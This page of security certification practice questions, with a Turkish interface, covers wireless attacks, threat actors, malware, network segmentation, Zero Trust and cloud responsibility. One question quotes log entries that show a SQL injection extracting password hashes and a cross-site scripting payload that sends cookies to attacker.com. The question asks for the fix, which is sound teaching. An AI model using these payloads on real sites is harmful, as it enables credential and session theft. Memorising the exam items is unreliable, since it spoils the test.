Tüm alıştırma soruları
2232 soru
An employee working in a public conference hall receives several unsolicited contact cards and pop-up text messages on their smartphone via Bluetooth. A subsequent investigation by an IT technician confirms that no files, credentials, or personal data were stolen or accessed from the device. Which of the following wireless attack indicators is described in this scenario?
A cybersecurity team at an automated pharmaceutical manufacturing plant is investigating a covert intrusion into their industrial control systems. The adversary maintained persistent access for eight months without detection, utilized proprietary zero-day exploits against specialized programmable logic controller (PLC) firmware, and subtly modified drug formulation parameters rather than attempting extortion or causing immediate system outages. Which TWO of the following threat actor attributes and attack vector characteristics are demonstrated in this scenario?
Geçerli olan tümünü seçin
A security analyst reviews host logs and process telemetry from an endpoint suspected of infection. The analyst notices unauthorized background screen captures being saved to a hidden directory and outbound HTTP POST requests transmitting encrypted archives to an unrated external IP address on port 443. Which of the following malware classifications and primary capabilities are indicated by these observed technical artifacts? (Select TWO.)
Geçerli olan tümünü seçin
A network security architect is reviewing the network segmentation design for an enterprise financial organization. The enterprise must implement appropriate isolation controls across diverse operational environments to satisfy regulatory compliance and mitigate lateral movement risks. Match each network design or segmentation technique on the left with its corresponding enterprise architectural requirement on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
A security analyst inspects a vulnerability scan report for an internal legacy application host. The report displays the following output:
Host: 10.12.8.44
Service: SMBv1 (Port 445/TCP)
Finding: Legacy file-sharing protocol active; vulnerable to remote code execution (MS17-010) and anonymous NULL session enumeration.
Risk Level: Critical
Which of the following actions represents the MOST effective host mitigation strategy to address this specific vulnerability?
Match each Zero Trust Architecture principle on the left with its corresponding operational description on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
A security analyst is investigating network monitoring alerts in a enterprise corporate office. Wireless packet captures and syslog entries show that client laptops are receiving spoofed 802.11 Deauthentication frames originating from a legitimate Access Point's BSSID. Immediately following disassociation, affected clients connect to a rogue access point broadcasting the corporate ESSID and prompting users for authentication via an insecure EAP-GTC protocol with an untrusted RADIUS server certificate. Which of the following statements correctly identify the attack mechanism and the most effective combination of technical controls to mitigate this threat? (Select TWO.)
Geçerli olan tümünü seçin
An enterprise security architect is evaluating cloud operational boundaries across various enterprise environments. Match each cloud service or deployment model scenario on the left with the corresponding customer security management responsibility on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
A security administrator needs to protect sensitive data stored on company laptops by ensuring that storage drives automatically encrypt all data at rest at the hardware layer without relying on the host operating system. Which of the following technologies best fulfills this requirement?
A security analyst is reviewing an audit report detailing cryptographic vulnerabilities identified across an enterprise network. Match each observed security incident or technical finding on the left with its underlying cryptographic weakness on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
During an investigation at a regional power grid operator, incident responders uncover an adversary that maintained persistent, undetected access across internal control networks for over nine months. The adversary utilized customized living-off-the-land techniques to exfiltrate SCADA architecture diagrams and operational telemetry while intentionally avoiding ransomware deployment or disruptive activity. Which of the following threat actor types and attribute profiles best aligns with this behavior?
A security analyst investigates application logs following an intrusion alert on a customer-facing portal and identifies two distinct HTTP request strings executed in rapid succession:
text
GET /search.php?item=102%20UNION%20SELECT%20username,password_hash%20FROM%20accounts-- HTTP/1.1
POST /feedback.php HTTP/1.1
Host: portal.example.com
Content-Type: application/x-www-form-urlencoded
comment=<script>document.location='http://attacker.com/steal?c='+document.cookie</script>
Based on the log evidence provided, which of the following software remediations must the development team implement to eliminate these specific application vulnerabilities? (Select TWO.)
Geçerli olan tümünü seçin
A biotechnology organization is establishing its security governance documentation. Executive leadership mandates the creation of an overarching, non-technical document that outlines management's strategic intent, defines security goals, and establishes mandatory rules for protecting intellectual property across the entire enterprise. Which security governance document type must executive leadership issue to satisfy this requirement?
An enterprise security architect is updating the organization's network architecture to mitigate lateral threat movement, secure legacy components, and control administrative access across enterprise zones. Match each network design or segmentation technique on the left with its corresponding architectural application on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
An enterprise architecture team is designing a NIST SP 800-207 compliant Zero Trust solution to enforce dynamic control plane and data plane boundaries across hybrid environments. Pair each Zero Trust logical component on the left with its precise operational function on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
Match each virtualization or containerization security control on the left with its corresponding primary isolation capability on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
A network administrator needs to host a publicly accessible web server while protecting internal enterprise databases from direct internet exposure. Which network design topology should the administrator implement to place the web server in an isolated perimeter zone between the external internet and the internal private network?
An enterprise security architect is designing a network architecture for a hybrid micro-datacenter that hosts PCI-DSS scoped payment processing workloads alongside unmanaged IoT environmental sensors on shared physical network switches. The design must prevent direct Layer 2 or Layer 3 lateral movement between any endpoints located within the same IP subnet, without requiring dedicated physical switches or administrative overhead from managing hundreds of individual VLAN subnets and IP pools. Which of the following secure network design strategies best meets these requirements?
During an enterprise incident response triage, security engineers analyze a compromised domain controller demonstrating unauthorized administrative activity. Diagnostics reveal that the attack payload was injected directly into system RAM using a legitimate administrative utility, executing strictly in volatile memory without writing any standalone binary file to the host hard drive. Which of the following malware classifications best describes this type of threat?
A regional utility provider migrates its customer telemetry analytics application to a cloud provider's Platform as a Service (PaaS) solution. During a routine vulnerability scan, an auditor discovers an unpatched kernel vulnerability in the underlying host operating system powering the database runtime. Under the cloud shared responsibility model, which of the following parties is responsible for patching this host operating system vulnerability?